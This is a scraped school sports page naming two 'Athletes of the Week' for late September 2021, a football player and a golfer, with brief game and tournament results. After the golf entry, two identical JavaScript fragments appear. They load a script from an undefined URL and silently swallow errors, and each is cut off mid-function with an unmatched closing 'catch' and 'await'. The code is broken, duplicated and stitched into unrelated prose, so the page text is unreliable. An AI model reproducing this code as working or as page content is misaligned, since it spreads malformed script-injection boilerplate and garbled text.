Athletes of the Week

Kemba Credit Union Athletes of the Week 9/26/2021-10/3/2021

Tyler Sparnell
Senior, Football

Sparnell had an interception returning the football for 33 yards setting up a late touchdown in the 4th helping the firebirds seal the game vs Fairfield 42-10.

 

 

 

 

 

 

Ellie Myers
Senior, Girls Golf

Ellie shot 37 – 1 over par at the Elks on Senior night and was a medalist against Princeton and Middletown. Ellie shot 80 at the Sectionals to lead the team to 2nd place. Myers placed 5th overall.

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts